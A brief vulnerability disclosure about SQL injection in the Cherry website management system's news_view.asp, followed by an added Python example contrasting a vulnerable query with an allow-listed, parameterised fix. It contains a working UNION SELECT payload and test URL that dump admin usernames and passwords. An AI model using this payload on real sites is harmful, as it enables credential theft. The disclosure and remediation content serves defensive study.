By Mr. DzY
From www.0855.TV
The Cherry website management system v1.1 has been released. Compared with v1.0, the pages look much better, and the upload vulnerability in eWebEditor 5.5 has been fixed.
However, the input filtering is not strict, resulting in SQL injection.
V1.0 related: http://www.bkjia.com/Article/201104/87868.html
Cherry enterprise website management system uses full DIV + CSS templates and adapts to multiple browsers, with full compatibility with IE6-IE8, Firefox, Google and other standards-compliant browsers. Template styling is centralized in a CSS stylesheet, and content and style are completely separated, which makes it easier for website designers to develop and manage templates. The system is relatively secure: it is designed to prevent injection and to block sensitive characters. News, products, and single pages each have independent keywords to improve search engine indexing.
EXP:
union select 1,user_name,password,4,5,6,7,8 from admin
Test:
http://www.bkjia.com/news_view.asp?id=11 union select 1,user_name,password,4,5,6,7,8 from admin
Fix: filter out...
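The following is an added example, not code from the CMS or from the original post. It shows why the id parameter needs an integer allow-list plus a bound parameter rather than character filtering. It uses Python's sqlite3 as a stand-in for the ASP backend and assumes the page concatenates id into its query; the news column names and all data are constructed, and only the admin table's user_name and password columns come from the post.

```python
import sqlite3

# Payload taken from the page's Test line (whitespace normalised).
PAYLOAD = "11 union select 1,user_name,password,4,5,6,7,8 from admin"

def build_db():
    """Constructed stand-in data: 8-column news table plus the admin table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                           c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT);
        CREATE TABLE admin (user_name TEXT, password TEXT);
        INSERT INTO news VALUES (11, 'Launch', 'Body text', '', '', '', '', '');
        INSERT INTO admin VALUES ('admin', 'constructed-hash');
    """)
    return db

def news_view_vulnerable(db, raw_id):
    # Assumed pattern: the id parameter is concatenated into the SQL text,
    # so anything after the number is parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id = " + raw_id).fetchall()

def news_view_hardened(db, raw_id):
    # 1) Allow-list the parameter: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    # 2) Bind it as a parameter so it can never be parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def leaks_admin(rows):
    # True if any returned row carries the constructed admin password value.
    return any("constructed-hash" in row for row in rows)

if __name__ == "__main__":
    db = build_db()
    print("vulnerable leaks admin row:", leaks_admin(news_view_vulnerable(db, PAYLOAD)))
    print("hardened, id=11:", news_view_hardened(db, "11"))
    try:
        news_view_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened rejects payload:", exc)
```

In classic ASP the same two steps map to validating the id value as an integer before use and executing the query through an ADODB.Command with a bound parameter.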